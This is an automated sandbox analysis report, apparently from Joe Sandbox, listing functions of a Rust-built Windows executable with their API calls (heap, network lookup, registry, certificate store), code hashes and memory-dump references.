String ID:
API String ID: 3036504266-0
Opcode ID: c68f9f7e36104f9ca505cb9533d8d82cf517ba12e9ca39c07a3feade470f87aa
Instruction ID: c8b813d3f7b904d5334be2ba5ef4ce81cf23a08e6e65de709052e63d68cfdbb2
Opcode Fuzzy Hash: c68f9f7e36104f9ca505cb9533d8d82cf517ba12e9ca39c07a3feade470f87aa
Instruction Fuzzy Hash: 24411C72B05B82D8EB149B6AE8443AD37B4BB887ACF444636CF5D97B95DF38D0918300

Function 00007FF6B1938D80 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 00007FF6B1939392

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
API String ID: 0-3680238006
Opcode ID: f2596dc25413a348d4196d2907e3edf591cf79e791ff229fe6334c5e64dd80ca
Instruction ID: 21c02915090ec885c719c41711af17eb93c52c686e66658d35e3b629c0f74635
Opcode Fuzzy Hash: f2596dc25413a348d4196d2907e3edf591cf79e791ff229fe6334c5e64dd80ca
Instruction Fuzzy Hash: C3227C62908BC699E7729F38D8457E83760FB5975CF049222DF8C5A65AEF34A3C6C300

Function 00007FF6B1903C27 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 351memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B19043F8

Strings

[internal exception] blocking task ran twice.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\task.rs, xrefs: 00007FF6B190414D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: [internal exception] blocking task ran twice.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\task.rs
API String ID: 3298025750-3192530117
Opcode ID: fd5df1fb2331be33093210793d09e5afe17da6f4a14909ad1c775c4e5e58fd21
Instruction ID: eaedf55762f24eaaec5e2c1e5fce215e4bf30c0f39a87eebb4b19db461fac6b1
Opcode Fuzzy Hash: fd5df1fb2331be33093210793d09e5afe17da6f4a14909ad1c775c4e5e58fd21
Instruction Fuzzy Hash: C6120A36A04BC699E7609F29D8843E837A0FB5875CF048136DB4D977AADF39E695C300

Function 00007FF6B19B16D0 Relevance: 3.1, APIs: 2, Instructions: 132networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FF6B19B186A
WSAGetLastError.WS2_32 ref: 00007FF6B19B1874

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorLastgetaddrinfo
String ID:
API String ID: 4160901379-0
Opcode ID: e117391902be7e91b71b12e19b0db313c9b77c71a5c5125fa8a5cd16f8e96df0
Instruction ID: ea0f47fa63dd19d33d0f5954c10aaf50e2e988f311e9305d23fc0022a6aa1806
Opcode Fuzzy Hash: e117391902be7e91b71b12e19b0db313c9b77c71a5c5125fa8a5cd16f8e96df0
Instruction Fuzzy Hash: 2451A162E08AC2D4E7659F69E9443FA27A1FB4479CF444232CB5D877C5EF3C9684C240

Function 00007FF6B1912800 Relevance: 3.1, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetQueuedCompletionStatusEx.KERNEL32 ref: 00007FF6B191291C
GetLastError.KERNEL32 ref: 00007FF6B1912995

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CompletionErrorLastQueuedStatus
String ID:
API String ID: 1532515109-0
Opcode ID: dc41b554e1be127f9b4d35dc6b87ecac8d21642b77bf4af19a54bdebec33eaf8
Instruction ID: e800ff541d950cc7c8f6a73eb47021d43edce07b874e51dfc1dfb584b23b6557
Opcode Fuzzy Hash: dc41b554e1be127f9b4d35dc6b87ecac8d21642b77bf4af19a54bdebec33eaf8
Instruction Fuzzy Hash: 5151D413E08AC2A5E760AF2DD9003FA2364FB5835CF159335EF6D126D6CE38A5E28700

Function 00007FF6B197BA50 Relevance: 3.1, APIs: 2, Instructions: 70registrymemoryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE ref: 00007FF6B197BAD3
HeapFree.KERNEL32 ref: 00007FF6B197BB10

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeapQueryValue
String ID:
API String ID: 1150147822-0
Opcode ID: 3401bd0cab9805572e81efcade4ae945cb509d1748fd9e1dac84ef57d0f5c876
Instruction ID: e1b02f7c1eb49f6620908af0c353716fda21e0b33ad53b5ab6fb7cd7cd95de5e
Opcode Fuzzy Hash: 3401bd0cab9805572e81efcade4ae945cb509d1748fd9e1dac84ef57d0f5c876
Instruction Fuzzy Hash: 2A216532604B429AE724DF29E8547E977A0FB4436CF544226EF5E86A94DF7CD046C740

Function 00007FF6B1972E30 Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF6B1972E71
RtlFreeHeap.NTDLL ref: 00007FF6B1972E8D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 09c09a3e90631f786fde2362aa6c8ec72e3753b492a35f4c28b14ce9bdb304fa
Instruction ID: 9aad5b735bebd2be80d817055522834babcda085a71ccb8b8d701e3e6affe37e
Opcode Fuzzy Hash: 09c09a3e90631f786fde2362aa6c8ec72e3753b492a35f4c28b14ce9bdb304fa
Instruction Fuzzy Hash: C4110066A19A46A2E7159B2BD9842782371FF84BA9F404A33CB1D877D5DF3CF4A18300

Function 00007FF6B18CBE64 Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B18CCDA6
HeapFree.KERNEL32 ref: 00007FF6B18CCDBC
HeapFree.KERNEL32 ref: 00007FF6B18CD218
HeapFree.KERNEL32 ref: 00007FF6B18CD63F
HeapFree.KERNEL32 ref: 00007FF6B18CD665
HeapFree.KERNEL32 ref: 00007FF6B18CD6A6
HeapFree.KERNEL32 ref: 00007FF6B18CD6D8
HeapFree.KERNEL32 ref: 00007FF6B18CD710
CloseHandle.KERNELBASE ref: 00007FF6B18CD71D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 982ffdeb985942891fec68d3c55d5c16c28c394286af596efe0621edd3ab023c
Instruction ID: 3326f71be27bd6c95ee95cd40fb836e0177ae0d471f485f58cb00c8488062099
Opcode Fuzzy Hash: 982ffdeb985942891fec68d3c55d5c16c28c394286af596efe0621edd3ab023c
Instruction Fuzzy Hash: 53D13736A04B8290EB409F29D4443A937A5FB48F8CF458236DF4D8B399DF39E495C390

Function 00007FF6B18E6DC0 Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FileObjectSingleWaitWrite
String ID:
API String ID: 1507886151-0
Opcode ID: eb5eedc53d2b70e13f18cc8b4a5fe2aa11145ff304edecc3339e6012c4ecf56d
Instruction ID: 6f771fa561a755a7b9be8007290f9fc487c542870488d233986547dbe52909a6
Opcode Fuzzy Hash: eb5eedc53d2b70e13f18cc8b4a5fe2aa11145ff304edecc3339e6012c4ecf56d
Instruction Fuzzy Hash: 954183A3B18A51A4FB14CB6AE8087BD6761BB44BECF548532DF1C97B98CF38D1428340

Function 00007FF6B19A4E50 Relevance: 2.6, APIs: 2, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,FFFFFF2E,?,?,?,?,?,00007FF6B19A134E), ref: 00007FF6B19A4F25

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dcd844a88e27fb4879ab5e0e43b12d722bdc4a8bc091af6cf406069eb0d0f2e1
Instruction ID: 647d96f91f2917b2bc9e7bad7ec56a7273fad147c367fb18ba65c5111aef8b5e
Opcode Fuzzy Hash: dcd844a88e27fb4879ab5e0e43b12d722bdc4a8bc091af6cf406069eb0d0f2e1
Instruction Fuzzy Hash: D4418E67A15A8695EB01CB69E8482AC7775F788BB8F184722CF2D537D4DF38D486C340

Function 00007FF6B1A02990 Relevance: 2.6, APIs: 2, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1A02B8E
HeapFree.KERNEL32 ref: 00007FF6B1A02BA1

Part of subcall function 00007FF6B19A82F0: NtWriteFile.NTDLL ref: 00007FF6B19A833C
Part of subcall function 00007FF6B19A82F0: WaitForSingleObject.KERNEL32 ref: 00007FF6B19A8351

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$FileObjectSingleWaitWrite
String ID:
API String ID: 1214400888-0
Opcode ID: 33558e6824a240838b9573e768d7a11a39df9637ce3f2697cd16dee5e6955ed0
Instruction ID: 3c56e73f25428a9a12ee4f3853e29cf8c16003abd42d44ce22a0b8245a099a92
Opcode Fuzzy Hash: 33558e6824a240838b9573e768d7a11a39df9637ce3f2697cd16dee5e6955ed0
Instruction Fuzzy Hash: 4441D462B08B45A5FB26CB1AA9582B95762BF45BE8F548533CF1D87794DF3CF0828200

Function 00007FF6B19C3DB0 Relevance: 2.6, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B19C3E73

Part of subcall function 00007FF6B18C4220: HeapFree.KERNEL32 ref: 00007FF6B18C4291
Part of subcall function 00007FF6B18C4220: HeapFree.KERNEL32 ref: 00007FF6B18C42F1

HeapFree.KERNEL32 ref: 00007FF6B19C3EDC

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c4adeb99c3e78691fdce26c38cbfebb50bd5d00a52736bb281ba72e4f8c0a06f
Instruction ID: 88fa34b40dcc25bcaefec0e2fd6d75d9e8bf3f7314ec15f0ada8b148aca98390
Opcode Fuzzy Hash: c4adeb99c3e78691fdce26c38cbfebb50bd5d00a52736bb281ba72e4f8c0a06f
Instruction Fuzzy Hash: 66411D22B19A4695FB119B6AE8401BD2771FB84BACF444532CF9E577A5DF38E682C300

Function 00007FF6B18C4220 Relevance: 2.6, APIs: 2, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B1912800: GetQueuedCompletionStatusEx.KERNEL32 ref: 00007FF6B191291C
Part of subcall function 00007FF6B1912800: GetLastError.KERNEL32 ref: 00007FF6B1912995

HeapFree.KERNEL32 ref: 00007FF6B18C4291
HeapFree.KERNEL32 ref: 00007FF6B18C42F1

Part of subcall function 00007FF6B18FF020: CloseHandle.KERNELBASE ref: 00007FF6B18FF02C

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CloseCompletionErrorHandleLastQueuedStatus
String ID:
API String ID: 656690911-0
Opcode ID: 63328072d23aa7f53f0f66a55e0dcc474c32ef97d63750a6d16bda51b6666864
Instruction ID: 2906838cacc129cf4b1b50b9bef8e56061879ef171bfa145bbd476b9cfdb241f
Opcode Fuzzy Hash: 63328072d23aa7f53f0f66a55e0dcc474c32ef97d63750a6d16bda51b6666864
Instruction Fuzzy Hash: 4C313C22A05A46A4E7119B6AE8856BD2371FB84BB9F454632CF2D873D4CF39D486C340

Function 00007FF6B1926FD5 Relevance: 1.5, APIs: 1, Instructions: 281memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1928630

Part of subcall function 00007FF6B19BFA30: GetProcessHeap.KERNEL32 ref: 00007FF6B1A08561

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 55cb57f8db6e0eaf6ca3a2796dd1c71ea5d0e22edb8e3fce5fb714708979b9b3
Instruction ID: 0aef0e85096b6e7370690d028e1c41ddad3ecd0ba509728c55d6ffb183540708
Opcode Fuzzy Hash: 55cb57f8db6e0eaf6ca3a2796dd1c71ea5d0e22edb8e3fce5fb714708979b9b3
Instruction Fuzzy Hash: 6A024973919BC185E3419F38E4557EA37A0FB58B4CF18423ADF885A38ADFB99185C360

Function 00007FF6B18BD3D0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,?,00000008,?,00007FF6B1A00F51), ref: 00007FF6B18BD3F9

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4085435bf238c4d4e5dbfa3776121c73b7c8205a83abdcbe3ab35fdf4e038b7e
Instruction ID: ff95d4b96778c82465768c19c0459240999db28953cc0509f888cb8edceca398
Opcode Fuzzy Hash: 4085435bf238c4d4e5dbfa3776121c73b7c8205a83abdcbe3ab35fdf4e038b7e
Instruction Fuzzy Hash: 66F09661A0969192E718971AB9893BA76E1BF457CCF148036CB4EC67A4DF3DA486C300

Function 00007FF6B19A0CB0 Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B1922CE0: HeapFree.KERNEL32 ref: 00007FF6B1922D0C
Part of subcall function 00007FF6B1922CE0: HeapFree.KERNEL32 ref: 00007FF6B1922D9F

Part of subcall function 00007FF6B19A0E90: CertFreeCertificateContext.CRYPT32 ref: 00007FF6B19A0EE9
Part of subcall function 00007FF6B19A0E90: CertCloseStore.CRYPT32 ref: 00007FF6B19A0EF5

HeapFree.KERNEL32 ref: 00007FF6B19A0D44

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Free$Heap$Cert$CertificateCloseContextStore
String ID:
API String ID: 77062578-0
Opcode ID: 4f584866cc386d0133103f951949522d3d364129675e683ea7a5f3770a488159
Instruction ID: 2a42c1538d2ed9c66c7e977da69d7cee4662ffbfdb09f01c2794c3f1ecb870d9
Opcode Fuzzy Hash: 4f584866cc386d0133103f951949522d3d364129675e683ea7a5f3770a488159
Instruction Fuzzy Hash: 30210862F14B86A5FB149B6AD8442BD2370FB84BA8F444636CF2C977D5CF38E4958380

Function 00007FF6B18B1150 Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B18B11B4

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 86a3decf3815e4c0c4e538d57e66080e66a02c700146b00103069acb6961d38e
Instruction ID: 9536060940238cbf082002ee81c2ecd43b6afa8483921a08b5e15fcde7d8718d
Opcode Fuzzy Hash: 86a3decf3815e4c0c4e538d57e66080e66a02c700146b00103069acb6961d38e
Instruction Fuzzy Hash: 50212C22B05F45D8EB119B6AE8402AE3770FB84BA8F448636CF5C97794CF39D5818340

Function 00007FF6B18E7310 Relevance: 1.3, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6B18CAA3F,?,?,?,?,?,?,?), ref: 00007FF6B18E7387

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: eac1a11912f56f992f94439bd98d977785bb625524384997ea0585686edf34e4
Instruction ID: 2f9ed4e1fb9883c1bfc8fac76c772edff8302d8326bfa3076f89e1136d5721d6
Opcode Fuzzy Hash: eac1a11912f56f992f94439bd98d977785bb625524384997ea0585686edf34e4
Instruction Fuzzy Hash: 30119123B14B45D9FB408B6AD8452BC23B0FB88BA8F548636CF1C83794DF39D5818340

Function 00007FF6B18FF020 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF6B18FF02C

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 02f600decfa8cc63b45f5227ed0dbe3b4d04e613de889692a218fa599dd210c8
Instruction ID: 461a687c6fc82bc1daa1ba075c7f6e4faf83eebe5552244ba574f79d8b6f1f27
Opcode Fuzzy Hash: 02f600decfa8cc63b45f5227ed0dbe3b4d04e613de889692a218fa599dd210c8
Instruction Fuzzy Hash: 92E08612E0895592F719575FB8880B42361EFC8778B548331CB3D862E4CF68A8C35300

Non-executed Functions

Function 00007FF6B194B550 Relevance: 95.5, APIs: 49, Strings: 5, Instructions: 951encryptionCOMMON

Download Yara Rule

APIs

QueryContextAttributesW.SECUR32 ref: 00007FF6B194B71C
CertDuplicateStore.CRYPT32 ref: 00007FF6B194B780
CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B194B798
CertDuplicateCertificateContext.CRYPT32 ref: 00007FF6B194B7B6
CertAddCertificateContextToStore.CRYPT32 ref: 00007FF6B194B7DD
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194B7F9
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B194B7FE
CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B194B807
CertCloseStore.CRYPT32 ref: 00007FF6B194B817
CertCloseStore.CRYPT32 ref: 00007FF6B194B83D
CertGetCertificateChain.CRYPT32 ref: 00007FF6B194B8ED
CertDuplicateCertificateChain.CRYPT32 ref: 00007FF6B194B92C
CertDuplicateCertificateChain.CRYPT32 ref: 00007FF6B194B968
CertFreeCertificateChain.CRYPT32 ref: 00007FF6B194B971
